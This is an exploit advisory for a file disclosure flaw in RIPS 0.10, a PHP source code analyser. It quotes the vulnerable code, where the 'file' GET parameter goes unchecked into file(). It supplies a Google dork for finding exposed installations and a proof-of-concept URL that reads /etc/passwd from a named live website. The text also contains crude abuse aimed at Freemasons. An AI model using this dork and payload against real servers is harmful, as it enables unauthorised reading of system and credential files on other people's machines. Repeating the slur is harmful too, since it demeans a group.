facebook facebook twitter rss

Rips-Scanner File Disclosure

Author: Asmar , Published: 08-06-2012
# --------------------------------------- #
Author : L3b-r1'z
Title : Rips-Scanner File Disclosure
Date\Time : 8/6/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintitle: "RIPS - A static source code analyser for vulnerabilities in PHP scripts"
Version : 0.10
# --------------------------------------- #
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :
In File code.php folder /windows/
In Line 102 To 108
$file = $_GET['file'];
$marklines = explode(',', $_GET['lines']);


if(!empty($file))
{
$lines = file($file);

We Have variable File _GET['file']

And We Have Function file($file);

File Function Is Like Show Source :D
# --------------------------------------- #
3) PoC :

http://domain.tld/windows/code.php?file=the correct path to file

Demo On WTF Im L33t :P :

http://www.wtfiml33t.com/windows/code.php?file=/etc/passwd

NOTE : Fuck All FREEMASONES
Another NOTE : FUCK ALL SCANNER TOOLS :@
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi.
# --------------------------------------- #

Like us on Facebook :